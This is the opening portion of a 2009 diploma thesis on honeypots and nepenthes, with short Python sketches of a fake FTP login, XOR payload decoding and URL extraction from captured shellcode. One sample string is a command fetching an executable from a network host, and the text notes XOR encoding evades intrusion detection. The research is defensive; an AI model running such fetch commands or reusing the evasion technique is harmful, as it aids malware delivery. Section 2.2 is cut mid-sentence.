Using Honeypots to Capture and Analyze Malicious Activities on the Internet

A Diploma Thesis by Stefan Vömel
August 2009

First Examiner: Prof. Dr.-Ing. Felix C. Freiling
Second Examiner: Prof. Dr.-Ing. Wolfgang Effelsberg
Advisor: Dr. Thorsten Holz

Declaration of Honor (Ehrenwörtliche Erklärung)

I hereby declare that I have prepared this diploma thesis without the help of third parties and using only the stated sources and aids. All passages taken from the sources have been marked as such. This thesis has not been submitted in the same or a similar form to any other examination authority.

Mannheim, August 2009
Stefan Vömel

Abstract

A honeypot is “an information system resource whose value lies in unauthorized or illicit use of that resource” (see Spitzner, 2003g,a). It is intentionally designed to be insecure and serves as an electronic bait to study the behavior of adversaries or protect an organization against Internet threats. Due to these characteristics, a honeypot complements traditional, more defense-oriented solutions such as firewalls or intrusion detection systems. However, the technology is also challenging: On the one hand, setting up a decoy can be a complex and time-consuming task. On the other hand, a compromised honeypot may pose a significant risk to unaffected third parties if the activities of the intruder are not properly anticipated.

In the scope of this thesis, we illustrate the development process of a so-called Live CD that implements a pre-configured, fully working electronic bait. With the help of our CD, numerous honeypots can be easily deployed within a short amount of time. The decoys are executed in a secured environment and, thus, can safely capture system probes and penetration attempts, particularly by self-spreading worms, viruses, and other types of autonomously propagating malware.
In the second part of this thesis, we present the architecture of our own honeynet, i.e., a specially monitored and controlled network of electronic baits. A honeynet makes it easier to collect more extensive and more meaningful information about computer criminals. Thereby, we are able to gain a deep insight into the underground community and better understand the tools, tactics, and motives of attackers.

Zusammenfassung (Summary)

A honeypot is an information system resource whose value lies in the unauthorized or illicit use of that resource (cmp. Spitzner, 2003g,a). As a deliberately insecure “electronic bait”, it makes it possible to study the behavior of malicious attackers or to detect potential threats from the Internet. Owing to these characteristics, a honeypot can also be used to protect organizations indirectly, and it complements classical, more defense-oriented security solutions such as firewalls or early warning systems. The use of an electronic bait does, however, involve certain challenges: On the one hand, setting it up can be laborious and time-consuming. On the other hand, a compromised honeypot may pose a considerable risk to uninvolved third parties if the activities of the attacker are not sufficiently counteracted.

In this diploma thesis, we therefore present a so-called Live CD with which pre-configured, fully functional baits can be set up within a short time. Because the systems run in a secured environment, intrusion attempts, above all by self-spreading worms, viruses, and other malicious programs, can be observed and recorded safely.

In the second part of this thesis, we illustrate the architecture of a honeynet, i.e., a specially monitored and controlled network of individual electronic baits. A honeynet makes it easier to collect more extensive and more meaningful information about computer criminals. We are thereby able to gain a comprehensive insight into an underground movement of the Internet and to better understand the tools, tactics, and motives of the attackers.

Contents

1 Introduction
2 Honeypot Technology
  2.1 Introduction to Honeypots
  2.2 High-Interaction Honeypots
  2.3 Low-Interaction Honeypots
  2.4 Example of an Advanced Low-Interaction Honeypot
  2.5 Deployment Options for Honeypots
  2.6 Summary
3 Honeynet Technology
  3.1 Historical Implementations of Honeynets
  3.2 GenII Honeynets
    3.2.1 Data Control Implementations
    3.2.2 Data Capture Implementations
  3.3 GenIII Honeynets
  3.4 Virtual Honeynets and Future Implementations
  3.5 Summary
4 Development of a Live CD-Based Honeypot
  4.1 Overview about Popular Live CD Distributions
  4.2 Selection Model for the Live CD Distributions
    4.2.1 Overview about the Decision Attributes
    4.2.2 Calculation of the Decision Weights
    4.2.3 Overview about the Scoring Model
    4.2.4 Selection of an Adequate Candidate CD
    4.2.5 Summary of the Methodology
  4.3 Development and Remastering Process of the Live CD
    4.3.1 Technical Architecture of Slax
    4.3.2 Project Specifications for the Live CD
    4.3.3 Illustration of the Remastering Process of the Live CD
    4.3.4 Capturing Autonomously Spreading Malware with the Live CD
    4.3.5 Summary
5 Implementation, Deployment, and Analysis of a Honeynet
  5.1 Overview about the Architecture of the Honeynet and the System Environment
    5.1.1 Technical Specification of the Honeypots
    5.1.2 Deployment of the Honeywall
    5.1.3 Preparation of the System Environment
    5.1.4 Summary of the Implementation and Deployment Process
  5.2 Overview about the Collected Honeynet Data
    5.2.1 Interactions with the Honeynet
    5.2.2 Common Attacks on the Honeynet
  5.3 Selected Attacks on the Honeynet
    5.3.1 Attack on the Microsoft Windows Honeypot
    5.3.2 Attack on the Linux Honeypot
  5.4 Analysis of an Underground Communication Channel
    5.4.1 Overview about the Captured Data
    5.4.2 Analysis of the Labeled Data
    5.4.3 Classification of the Entire Text Corpora
    5.4.4 Noticeable Characteristics of the Underground Market
  5.5 Summary
6 Synopsis and Conclusion
A Configuration Script for the Nepenthes Honeypot
B Boot Options of the Live CD
References

List of Figures

2.1 User Interface of the Low-Interaction Honeypot Specter
2.2 Architecture of the Low-Interaction Honeypot nepenthes
2.3 Setup and Architecture of a Virtual Honeypot
2.4 Architecture of User-Mode Linux
2.5 Illustration of the Bridged Networking Functionality in VMWare
3.1 Overview about the Honeynet Architecture
3.2 Architecture of a GenI Honeynet
3.3 Architecture of a GenII Honeynet
3.4 Network Filtering Capabilities of the Honeynet Gateway
3.5 Illustration of a Full and a Half-Open TCP Handshake
3.6 Packet Drop Mode (PDM) of Snort Inline
3.7 Redirection of System Calls in the Sebek Monitoring Software
3.8 Covert Data Channel Used by the Sebek Monitoring Software
3.9 Example of a Hybrid Virtual Honeynet
3.10 Example of a Distributed Honeynet
4.1 Selection Process for the Live CD Distributions
4.2 Example of an Ordinal Rating Scale
4.3 Boot Sequence of the Slax Live CD
4.4 Illustration of the Union File System
4.5 Functionality of the Live CD-Based Honeypot
4.6 Overview about the Remastering Process
4.7 Illustration of the GNU Configure and Build System
4.8 Directory Structure of the Secured Live CD Environment
4.9 Honeypot Configuration Interface of the Live CD
4.10 Architecture of the Notification System on the Live CD
4.11 Overview about the Recompilation Process of the Kernel
4.12 Two-Factor Authentication Process of the SSH Service
4.13 Components of the KDE Platform
4.14 User Interface of the Live CD
4.15 Origin and Intensity of Malware Attacks
4.16 Number of Detected Malware Downloads and Submissions per Day
4.17 Detection Rates of 32 Antivirus Vendors
4.18 Individual Performance of 32 Antivirus Vendors
5.1 Main Screen of the Walleye Web Management Interface
5.2 Overview about the Network Flows from/to the Honeynet
5.3 Example of an Intrusion Attempt on a Honeypot
5.4 Example of a Trojaned System Service
5.5 Restoring a Captured FTP Session with Wireshark
5.6 Analyzing Web-Based Attacks with DataEcho
5.7 System Architecture of the Honeynet
5.8 Origins of Machines Interacting with the Honeynet
5.9 Classification of Attacks Reported by the Snort Intrusion Detection System
5.10 Request of the DFind Vulnerability Scanner
5.11 Geographical Spread of PopUp Spam Attacks
5.12 Packet Dump of the Slammer Worm
5.13 Origins of Password Brute Force Attacks
5.14 User Accounts Targeted By Password Brute Force Attacks
5.15 Schematic Overview of a Distributed Denial of Service Attack
5.16 Number of UDP Packets Captured per Day in the Honeynet
5.17 Timeline of a UDP Packet Storm on a Honeypot
5.18 Analysis of a UDP Packet Storm
5.19 User Interface of the c99 shell Trojan Backdoor
5.20 Analyzing Encrypted Network Traffic with Wireshark
5.21 Subversion of a System With the Hacker Defender Rootkit
5.22 Custom Login Banner of the Attacker
5.23 Timeline of the Attack on the Windows Honeypot
5.24 Flowchart Diagram of the Captured Attack Tools
5.25 Timeline of the Attack on the Linux Honeypot
5.26 Number of Messages Sent per Day to the Communication Channel
5.27 Number of Active Users per Day in the Communication Channel
5.28 Distribution of Offers and Requests for Hacking-Related Goods and Services
5.29 Types of Hacking-Related Goods and Services
5.30 Process of a Machine Learning-Based Text Classification
5.31 Estimated Distribution of Offers and Requests in the Text Corpora
5.32 Active Lifetime of Nicks in the Communication Channel

List of Tables

2.1 Advantages and Disadvantages of Low-Interaction and High-Interaction Honeypots
3.1 List of Possible netfilter Actions
3.2 List of Connection States as Distinguished by IPTables
3.3 Metrics Used by the p0f Passive Fingerprinting Utility
4.1 Main Characteristics of Live CD Distributions
4.2 Attribute Ranks and Weights for the Candidate CDs
4.3 Attribute Values for the Candidate CDs
4.4 Attribute Ratings and Weighted Sums for the Live CDs
4.5 Weighted Sums for the Live CDs after the Sensitivity Analysis
4.6 Base Modules Included in the Slax Live CD
4.7 Custom-Built Modules of the nepenthes Low-Interaction Honeypot
4.8 Dependency Libraries Required for the nepenthes Low-Interaction Honeypot
4.9 Overview about the Run Levels of the Operating System
4.10 Important User and System-Wide Directories of the KDE Platform
4.11 Top Malware Samples Captured with the Live CD
5.1 Technical Specification of the Honeypots
5.2 Important Configuration Options of the Honeywall
5.3 Top 10 Countries Interacting with the Honeynet
5.4 Origins of PopUp Spam attacks
5.5 Top 30 Passwords Used During Brute Force Attacks
5.6 Countries Involved in Different Distributed Denial of Service Attacks
5.7 Additional Components of the Serv-U FTP Server that are Required to Establish a Secured Connection
5.8 Attack Tools Used During the Compromise of the Windows Honeypot
5.9 Attack Tools Used During the Compromise of the Linux Honeypot
5.10 Average Precision and Recall Values of the Training Data

Listings

3.1 Sample Rule for the Packet Replace Mode (PRM) of Snort Inline
3.2 Example of a Swatch Configuration File
3.3 Sample Rule of the Snort Intrusion Detection System
4.1 Preparation of the System Environment
4.2 Sample Boot Label of the Isolinux Boot Loader
4.3 Creating a Kernel Logo for the Live CD
4.4 Compiling the Kernel for the Live CD
4.5 Mounting the Initial Ram to Adapt the linuxrc Start File
4.6 Example of a TCP Wrapper Configuration
5.1 Restoring Windows Executables with PEHunter
5.2 Example of a Network Scan for Instances of the phpMyAdmin Database Administration Program
5.3 Example of a PopUp Spam Message
5.4 Manipulation of the System Database
5.5 Installation of the Serv-U FTP Server
5.6 Modification of the System Registry
5.7 System Hardening Operations on the Compromised Honeypot
5.8 Extract of Keystrokes Captured by Sebek
5.9 Setup Script of a Trojaned Secure Shell Server
5.10 Backdoor Mechanism Implemented in the Secure Shell Server
5.11 Exploit for the Webmin and Usermin Web Applications
5.12 Sample Advertisement for Hacking-Related Goods
5.13 Sample Advertisements and Requests for Stolen Credit Cards and Credit Card-Related Information
5.14 Sample Advertisements and Requests for Cashiers, Confirmers, and Drops
5.15 Sample Advertisements and Requests for Bank Logins and Online Accounts
5.16 Sample Advertisements and Requests for Hacked Hosts
5.17 Example of a Full Personal Record
5.18 Sample Advertisements and Requests for Personal Data
5.19 Sample Advertisements and Requests for Hardware Equipment
5.20 Sample Messages Indicating Distrust in Other Market Participants

1 Introduction

In the course of slightly less than one and a half decades, the Internet has evolved into one of the major information and communication platforms: According to a study by the Miniwatts Marketing Group (2008), the number of Internet users worldwide has risen from 16 million in 1995 to more than 1.5 billion in 2009. By the year 2010, up to 1.65 billion people are expected to browse web pages, read e-mail, visit chat rooms, and participate in online discussion forums. In parallel, the commercial role of the World Wide Web (WWW), as the Internet is also frequently called (cmp. Tanenbaum, 2003), has become more and more important as well: For instance, in Germany alone, revenues in electronic commerce have more than doubled to 438 billion euros within a period of three years (see Pols, 2007), and almost one out of three Europeans has ordered goods or services online in the last twelve months (see Eurostats, 2008).

Unfortunately, with the increasing use and financial importance of the Internet, computer systems and network architectures have become valuable targets for cyber criminals, too. Human miscreants as well as automated viruses, worms, and other types of autonomously propagating malware attempt to exploit vulnerabilities in system platforms and software applications in order to gain control of the underlying machine. At the time of this writing, more than 44,000 security weaknesses have been discovered (see CERT, 2009). What is worse, as a survey by the Computer Security Institute (CSI) shows, 43% of the interviewed business organizations have already fallen prey to an attack (Richardson, 2008, pp.
13-16). On average, the respondents suffered a loss of almost $290,000.

To keep up with current and future threats, many corporations consider security one of the top goals in the information technology (IT) sector (cmp. Capgemini, 2008). To a great degree, however, implementations are based on traditional, purely defense-oriented technologies, e.g., firewalls, intrusion detection systems (IDSs), and encryption routines (see Honeynet Project, 2006). The main objective of these approaches is to recognize malicious activities in time and protect the infrastructure of the enterprise as well as possible. Getting to know the tools, tactics, and motives of intruders is of lesser priority. As a result, the role of administrators is restricted to reaction, and blackhats succeed in gaining informational advantages in the long term (cmp. Honeynet Project, 2004b). For this reason, IT professionals have more recently begun to emphasize proactive measures as well and have suggested deploying so-called honeypots.

Honeypots are closely watched electronic baits that are intentionally designed to be insecure. Because they form potentially attractive targets, attackers are lured into a trap when they try to compromise a machine: While they break into the decoy, all their actions are recorded and analyzed. Thus, it is possible to learn the offensive techniques of adversaries in detail, develop appropriate counter-strategies, and prevent similar system penetrations in the future (cmp. Spitzner, 2001a).

Outline of the Thesis

This thesis is outlined as follows: In Chapter 2, we introduce the concept of honeypots in detail. We illustrate the fundamental characteristics of different types of decoys and depict their respective advantages and disadvantages. Furthermore, we briefly describe common deployment approaches for electronic baits that have proven useful in practice for capturing malicious activities.
As we will see, multiple honeypots may be combined in a so-called honeynet to observe attacks not only on a single system, but on a network-wide scope. Even though this procedure may help create more accurate profiles of adversaries, we also need to implement sophisticated control and monitoring facilities in order to mitigate risks for uninvolved third parties as well as possible. We give an overview of these activities as well as of historical, modern, and future honeynet technologies in Chapter 3.

At the time of this writing, deploying larger numbers of electronic baits can be a complex and time-consuming task (see also Sadasivam et al., 2005). For this reason, we develop a bootable Live CD that runs completely in memory and comprises a pre-configured, working honeypot. The development and evaluation process of the device is the subject of Chapter 4. With the help of our CD, numerous decoys may be easily and comfortably connected to the Internet within a short amount of time. Thereby, we are able to collect threats such as autonomously propagating worms and viruses on a large scale.

In addition, we set up several machines that offer access to full-featured operating systems, services, and applications. Since the individual components contain certain well-known security weaknesses, the machines form attractive targets, particularly for human miscreants. A selection of specific attacks that we have witnessed in the course of this thesis is presented in Chapter 5. We conclude with a short summary of our work in Chapter 6 and propose various opportunities for future research.

Results of the Thesis

As we have already indicated, the Live CD that we have developed in the course of the thesis significantly facilitates the configuration and deployment process of electronic baits. Security professionals are able to connect a fully working decoy to the Internet and start monitoring probes and compromises within minutes.
Each threat that is captured with the CD is automatically sent to a central analysis station for further investigation. Reports that are generated by the station may help assess the potential risk on the Internet that is caused by common worms, viruses, and other types of autonomously spreading malware. Moreover, the collected samples may be used to evaluate the performance of virus scanners and similar security-related software products. In our preliminary test with more than 1,000 unique malicious binaries, the detection rates of different anti-virus vendors turned out to vary dramatically in some cases.

In addition, we have deployed and maintained a small honeynet with three electronic baits over a period of slightly more than five months. During this time, we have captured more than 21.5 Gb of raw network traffic and monitored a large number of probes and penetration attempts on the individual decoys. After examining the incidents in detail, we illustrate typical attack strategies that security professionals are likely to be confronted with in practice as well. Furthermore, we present two selected compromises, one of a Linux-based and one of a Windows-based honeypot, and outline the tools, tactics, and motives of the intruders. Thereby, we are able to catch a glimpse of the underground community and gain a better understanding of adversaries operating in cyberspace to date.

Acknowledgements

First and foremost, I would like to thank Prof. Dr. Felix Freiling for giving me the opportunity to work in the field of IT security at the Laboratory for Dependable Distributed Systems, University of Mannheim. I would also like to express my deepest gratitude to my advisor, Dr. Thorsten Holz. He always gave me valuable advice and feedback, indicated new research directions, and did not leave any of my questions unanswered. Many thanks go to Johannes Stüttgen as well.
Without his assistance, I would not have been able to deploy my Live CD and start capturing autonomously spreading malware. The same holds true for Viviana Nichica, who was indispensable in translating the source code of several Romanian attack tools. Acknowledgements are also owed to Jürgen Jaap for providing me with the necessary hardware equipment and to Ben Stock for setting up my personal interface to the analysis station. In addition, I greatly benefited from the dedication of the members of the Honeynet Project. In particular, I appreciate the support of Robert McMillen and Earl Sammons. Last but not least, I would like to thank Nicholas Chantler for sending me his PhD thesis and helping me gain an insight into the mind of adversaries.

2 Honeypot Technology

As we have indicated in the introduction of this thesis, business corporations in particular focus on traditional, defense-oriented techniques in order to protect their resources from threats on the Internet. For example, administrators frequently deploy firewalls, intrusion detection systems (IDS), and intrusion prevention systems (IPS) to identify suspicious activities at the network perimeter (cmp. Deloitte, 2009). With the help of signatures, i.e., patterns of well-known attacks, the devices are able to discover a broad category of penetration attempts (see Paxson, 1998). Many implementations also look for anomalies in network data and attempt to recognize unusual traffic flows that are potential signs of an incident (see Barford et al., 2002; Leckie and Kotagiri, 2002; Jung et al., 2004).

In spite of these benefits, Richardson (2008, p. 17) argues that the “measures that organizations have taken against their attackers (...) are fundamentally imperfect”.
For instance, both intrusion detection and intrusion prevention systems suffer from several inherent problems: First, the systems generate a significant number of false positives, i.e., legitimate traffic is erroneously reported as being malicious (see Zhang and Leckie, 2006). Such misclassifications are a serious issue as “they diminish the value and urgency of real alerts” (see Timm, 2001). What is worse, these technologies also have difficulties in reliably detecting specific types of probes and attacks (see Levchenko et al., 2004) or may even be completely circumvented (see Handley et al., 2001; Chung et al., 1995; Ptacek and Newsham, 1998; Wagner and Soto, 2002). To properly cope with these factors, IT professionals have recently started to propose the use of electronic baits in addition to more conventional methods of combating computer crime. The characteristics of these so-called honeypots are presented in detail in the following sections.

Outline of the Chapter

In Section 2.1, we introduce the concept of honeypots, outline their value, and illustrate their field of application. As we will see, we may distinguish two basic types of electronic baits. Their individual advantages and disadvantages are explained in Sections 2.2 and 2.3, followed by a brief description of a particularly powerful decoy that is capable of capturing self-propagating worms, viruses, and other malicious software programs on a large scale. Last but not least, we sketch two common deployment options for honeypots and conclude with a short summary of our findings.

2.1 Introduction to Honeypots

In compliance with the original posting on the honeypot mailing list, we define a honeypot as “an information system resource whose value lies in unauthorized or illicit use of that resource” (see Spitzner, 2003g,a).
It acts as an electronic bait for computer criminals that is intentionally designed to be probed, attacked, and compromised (see Spitzner, 2002). It is important to note that, according to the definition, such a resource may potentially be any digital entity, e.g., a database or a document (cmp. Honeynet Project, 2004b). In the scope of this thesis, however, we use the term honeypot for a single computer system. Any other resource that serves as a decoy is termed a honeytoken for clarity (cmp. Spitzner, 2003f).

Honeypots have no production value, i.e., they offer no productive services that are of interest to legitimate system users (see also Spitzner, 2001a). Consequently, any transactions and interactions with these machines are suspicious and likely reflect unauthorized or malicious activity. For this reason, the data sets collected with a honeypot as well as the number of encountered false positives are significantly smaller than those of traditional monitoring devices such as IDSs and IPSs. That is why security professionals may manage and analyze incident-related information more easily (cmp. Honeynet Project, 2004b). In addition, as “any activity with the honeypot is an anomaly”, we can detect and identify previously unknown intrusion strategies, because “new or unseen attacks stand out” (see Honeynet Project, 2004b, p. 19).

For these purposes, we also record all traffic flows entering or leaving a decoy with several software applications that are provided and maintained by members of the Honeynet Project. As we will see in Chapter 5, these applications are extremely powerful and even permit monitoring encrypted network sessions. Thereby, we are able to recover the steps of adversaries and learn more about their specific tools, tactics, and motives. This research-oriented approach facilitates a better understanding of the underground community in the long term and encourages finding proper countermeasures against miscreants (see Spitzner, 2002).
On the other hand, when deployed within a production environment, honeypots may help recognize threats in time and protect the resources of an organization. Thus, they directly contribute to the security of an enterprise (cmp. Spitzner, 2001a, 2003e).

Depending on the level of risk that is associated with an electronic bait and the possibilities of interaction, we distinguish between high-interaction and low-interaction honeypots. The major characteristics of these two types are presented in the following.

2.2 High-Interaction Honeypots

High-interaction honeypots are frequently based on commercial off-the-shelf (COTS) computer systems and offer attackers complete operating systems as well as fully functional applications and services to interact with (cmp. Provos and Holz, 2007). Thus,
Second, some efforts have been made in the underground community more recently to detect the presence of a monitored environment. For example, various authors succeeded in reliably identifying data capture facilities running on a decoy (see Corey, 2003, 2004; Dornseif et al., 2004a). Other approaches seek to find anomalies in the system setup and attempt to distinguish honeypots from real machines (see Holz and Raynal, 2005b; Provos and Holz, 2007). When a device has successfully been detected, it is likely that adversaries will either completely evade it in the future or insert bogus data in order to pollute log files and make a later investigation more difficult (see Spitzner, 2004). In this case, its value is dramatically reduced, and “the game is almost over” (see Holz and Raynal, 2005b, p. 30). Furthermore, because of the inherent open architecture of high-interaction electronic baits, the external environment is constantly exposed to a certain level of threat (see Spitzner, 2001b). For example, adversaries may use a compromised decoy as a starting point for further malicious activities. That is why each honeypot must be carefully administered and closely watched in order to mitigate risks for unaffected third parties as best as possible. Participants of the Honeynet Project have developed a number of utilities that greatly facilitate the latter tasks. We will give a detailed overview of these utilities in Chapter 3.

2.3 Low-Interaction Honeypots

The level of risk as described above can be significantly reduced when using low-interaction honeypots. These electronic baits only emulate specific services, i.e., intruders are tricked into believing that they are interacting with a real machine, while in reality, they operate in a closely watched, simulated environment (cmp. Spitzner, 2002). For instance, a low-interaction honeypot may provide a virtual FTP server attackers can connect to.
When a session is initiated and the adversary attempts to log in, her IP address as well as her authentication credentials are recorded for information gathering purposes. Any other additional requests such as uploading or downloading files are, however, rejected (cmp. Spitzner, 2003a). Thus, in comparison to high-interaction honeypots, the possibilities of interaction are substantially reduced. Consequently, administrators stay in control of their machine and do not need to be afraid of a total system compromise. In parallel, the risk for the external environment is effectively minimized. Low-interaction honeypots are easy to install, configure, and maintain (see Spitzner, 2002). That is why they may be deployed on a large scale without difficulty. For example, in the course of the Leurre.com project¹, security professionals have started to set up numerous platforms with several emulated operating systems in different locations all over the world. Each platform periodically sends its captured data to a central database. Thereby, it is possible to generate extensive statistics about attack patterns and trends at a higher level of abstraction, even though the amount of information collected with a single decoy may be quite limited (see Pouget et al., 2005; Holz, 2006). Similar approaches have been pursued by other authors to examine the spread of autonomously propagating malware on the Internet (see Provos, 2004; Bächer et al., 2006; Göbel et al., 2006; Itzel, 2007). On the other hand, due to their simple design, low-interaction honeypots are often unable to deal with unexpected behavior, i.e., they are not capable of capturing 0-day exploits or other previously unknown threats. What is worse, they are comparatively easy to fingerprint: For instance, sophisticated attackers may trigger resource-intensive operations and examine corresponding response latencies to reveal the true nature of the decoy (cmp. Provos and Holz, 2007).
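The emulated FTP login described above can be sketched in a few lines of Python. This is a minimal illustration, not the implementation of any particular honeypot product: the class name FtpDecoySession, the exact reply texts, and the example IP address are assumptions made for this sketch, and the network socket handling is left out so that only the dialogue logic is shown.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class FtpDecoySession:
    """Emulates only the login dialogue of an FTP server (hypothetical sketch)."""
    peer_ip: str
    username: Optional[str] = None
    captured: List[Tuple[str, str, str]] = field(default_factory=list)

    def handle(self, line: str) -> str:
        """Return the reply for one command line sent by the client."""
        command, _, argument = line.strip().partition(" ")
        command = command.upper()
        if command == "USER":
            self.username = argument
            return "331 Password required."
        if command == "PASS":
            # Record who tried which credentials, then always refuse the login.
            self.captured.append((self.peer_ip, self.username or "", argument))
            self.username = None
            return "530 Login incorrect."
        if command == "QUIT":
            return "221 Goodbye."
        # Uploads, downloads, and all other requests are rejected.
        return "530 Please login with USER and PASS."


session = FtpDecoySession(peer_ip="203.0.113.7")
replies = [session.handle(cmd) for cmd in ("USER root", "PASS toor", "RETR /etc/passwd")]
```

Because no login ever succeeds, the adversary never reaches a state in which files could be transferred, which is what keeps the risk of such a decoy low.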
As we have already explained, the value of a honeypot decreases considerably once it has been identified. In spite of these disadvantages, low-interaction honeypots are frequently favored within a production environment and are particularly popular among organizations in the financial and manufacturing industries (see Honeynet Project, 2004b). The majority of existing solutions is offered free of charge, e.g., the rather old Deception Toolkit (DTK)² or the Tiny Honeypot (thp)³ by George Bakos. Commercial products such as Specter⁴ usually permit emulating a larger number of operating systems and services. Their behavior and appearance can be easily configured and adapted with a comfortable graphical user interface (see Figure 2.1). Thereby, the deployment process of a decoy may be completed within a short amount of time. A more advanced variant of a low-interaction honeypot is the subject of the following section.

¹ see http://www.leurrecom.org/
² see http://all.net/dtk/download.html
³ see http://www.alpinista.org/thp/
⁴ see http://www.specter.com/

Figure 2.1: User Interface of the Low-Interaction Honeypot Specter (Source: NETSEC, 2009)

2.4 Example of an Advanced Low-Interaction Honeypot

A powerful variant of a low-interaction honeypot is nepenthes⁵. It is open source, free of charge, and is actively maintained by Paul Bächer, Markus Kötter, and several other security professionals. Nepenthes is particularly suitable for capturing self spreading malware on a large scale, i.e., it is capable of downloading considerable amounts of worms, bots, and other types of malicious software that are autonomously propagating in the wild (see Provos and Holz, 2007). For instance, in a preliminary study, Goebel et al. (2007) succeeded in retrieving more than 2,500 unique malicious binaries in a period of only 8 weeks.
Similar collections may help identify common threats on the Internet, generate statistics about current attack patterns, and support the development of high-quality detection signatures for antivirus scanners and other security-related applications.

⁵ http://nepenthes.carnivore.it/

Figure 2.2: Architecture of the Low-Interaction Honeypot nepenthes (Source: Bächer et al., 2006)

With respect to its architecture, nepenthes is based on a flexible design and consists of various program modules that are required for capturing and processing the different malware samples. In particular, Bächer et al. (2006) distinguish vulnerability modules, shellcode parsing modules, fetch modules, submission modules, and logging modules. Their functionality is briefly illustrated in the following. An overview of the individual components and their interaction is given in Figure 2.2. The core of the low-interaction honeypot is formed by a number of vulnerability modules. These modules emulate known security weaknesses in Windows-specific system services, e.g., the Microsoft SQL Server 2000 database management system, the Microsoft Internet Information Services 5.0 (IIS 5.0) web server, or the Distributed Component Object Model (DCOM) interface (see Microsoft Corporation, 2002, 2003a,b). It is important to note, however, that nepenthes does not simulate the complete behavior of a service, but rather only those program fragments that are of relevance to the vulnerability. As Wicherski and Holz (2006) point out, these fragments are usually sufficient to deceive malicious binaries and provoke an attack. In comparison to other electronic baits, this approach has several advantages: First, system requirements regarding processing resources and memory are quite low. As a result, the solution is highly scalable, and multiple instances of nepenthes can be deployed in parallel. Second, development efforts are dramatically reduced. For instance, Bächer et al.
(2006) note that a working module often comprises fewer than 500 lines of source code. Due to the decreased level of complexity, honeypot administrators may also quickly react to emerging threats. For example, in 2004, the Local Security Authority Subsystem Service (LSASS) in the Microsoft Windows operating system was prone to a so-called buffer overrun (see Microsoft Corporation, 2004c): A sophisticated attacker could remotely overwrite sections of internal memory by sending a specially crafted character sequence to the service. As a consequence, it was possible to execute arbitrary malicious code and gain control of the underlying machine. Shortly after the release of the official security bulletin, a Proof of Concept (PoC) paper was published that successfully demonstrated the exploitation of the security weakness (see SecurityFocus, 2004; Wicherski and Holz, 2006). Based on this information, the nepenthes development team was able to program a corresponding vulnerability module and simulate an affected platform within a short amount of time. In consequence, it was possible to study the penetration technique in more detail and quickly start capturing newly spreading attack tools. When an emulated service is compromised, the payload or shellcode of the attack is passed to a shellcode parsing module. The shellcode is frequently stored within a character array and contains machine language instructions that are injected into the target program in order to manipulate its functionality (see Koziol et al., 2004). The instructions must not include any null bytes though, because these are interpreted as string terminators and may cause the attack to fail (see Aleph One, 1996). To properly cope with this issue, adversaries usually encode their payload with exclusive-or (XOR) operations. As Bächer et al. (2006) argue, this procedure also helps evade certain sensors of intrusion detection systems.
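The following Python sketch illustrates why XOR encoding solves the null byte problem and why it is easy to reverse. It assumes the simplest variant, a single-byte key. The function names and the placeholder byte string are chosen for illustration only, and the decoders actually shipped with nepenthes are not reproduced here.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def find_null_free_key(data: bytes) -> int:
    """Return the smallest key for which the encoded data contains no null byte."""
    for key in range(1, 256):
        if key not in data:  # b ^ key == 0 holds only when b == key
            return key
    raise ValueError("every possible key value occurs in the data")


payload = b"GET\x00sample\x00"   # placeholder bytes, not real shellcode
key = find_null_free_key(payload)
encoded = xor_bytes(payload, key)
decoded = xor_bytes(encoded, key)
```

Since XOR with the same key is its own inverse, a parsing module that knows or recovers the key can restore the original byte sequence with the same operation that was used to encode it.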
Therefore, to restore the original payload used during the intrusion, the parsing module must first decode the captured character sequence. The result can then be examined with the help of regular expressions in the next step, e.g., to find the source address of the respective binary. This information is needed by the fetch modules to retrieve the sample from the Internet. At the time of this writing, different transfer modes and network protocols such as HTTP (Hypertext Transfer Protocol), FTP (File Transfer Protocol), or TFTP (Trivial File Transfer Protocol) are supported. Furthermore, two special modules are capable of dealing with IRC-related (Internet Relay Chat-related) propagation methods that are favored by certain viruses, worms, and other types of Internet threats (see Holz, 2005). After a malicious file has been downloaded from its remote location, it can either be stored on the local hard disk, sent to a central database, or directly to a sandbox for further investigation. These tasks are performed by the submission modules. In the latter case, the executable is safely launched within a controlled environment (see Willems et al., 2007). Thereby, it is, for instance, possible to observe manipulations of the file system structure, while mitigating the risk for uninvolved third parties as best as possible. Apart from the program modules, nepenthes offers a number of additional features that facilitate collecting autonomously spreading malware on a large scale, including a virtual file system and a rudimentary, emulated shell attackers can interact with. Moreover, the software comprises sophisticated logging capabilities that even permit monitoring penetration attempts in real time. Last but not least, with the DNS (Domain Name System) resolver module and an internal geographic database, attacks can be efficiently traced to their country of origin.
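The hand-over from the shellcode parsing modules to the fetch modules can be pictured as follows. The sketch assumes that the decoded payload contains the download location as a plain URL. The regular expression, the module names in FETCH_MODULES, and the example payload are hypothetical and do not reproduce the patterns or identifiers used by nepenthes itself.

```python
import re
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Hypothetical pattern: a download location embedded in the decoded payload.
URL_PATTERN = re.compile(rb"(?:http|ftp|tftp)://[\x21-\x7e]+")

# Hypothetical mapping from the URL scheme to the name of a fetch module.
FETCH_MODULES = {"http": "fetch-http", "ftp": "fetch-ftp", "tftp": "fetch-tftp"}


def locate_sample(decoded_payload: bytes) -> Optional[Tuple[str, str]]:
    """Return (fetch module name, URL) for the first URL found, or None."""
    match = URL_PATTERN.search(decoded_payload)
    if match is None:
        return None
    url = match.group(0).decode("ascii")
    return FETCH_MODULES[urlsplit(url).scheme], url


decoded = b"\x90\x90cmd /c tftp://198.51.100.23/sample.exe\x00\x00"
result = locate_sample(decoded)
```

A payload without a recognizable location yields None, in which case no fetch module would be invoked in this sketch.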
In sum, these features enable security professionals to generate extensive statistical reports about adversaries and their intrusion strategies. Most of the components described above can be tweaked and adapted, making the low-interaction honeypot a very flexible and powerful tool (see Bächer et al., 2006). We will illustrate the individual configuration options of the decoy in more detail in Chapter 4. We will also illustrate how a bootable device with a pre-configured, fully working nepenthes sensor can be developed. This device can make the deployment of numerous electronic baits significantly easier.

2.5 Deployment Options for Honeypots

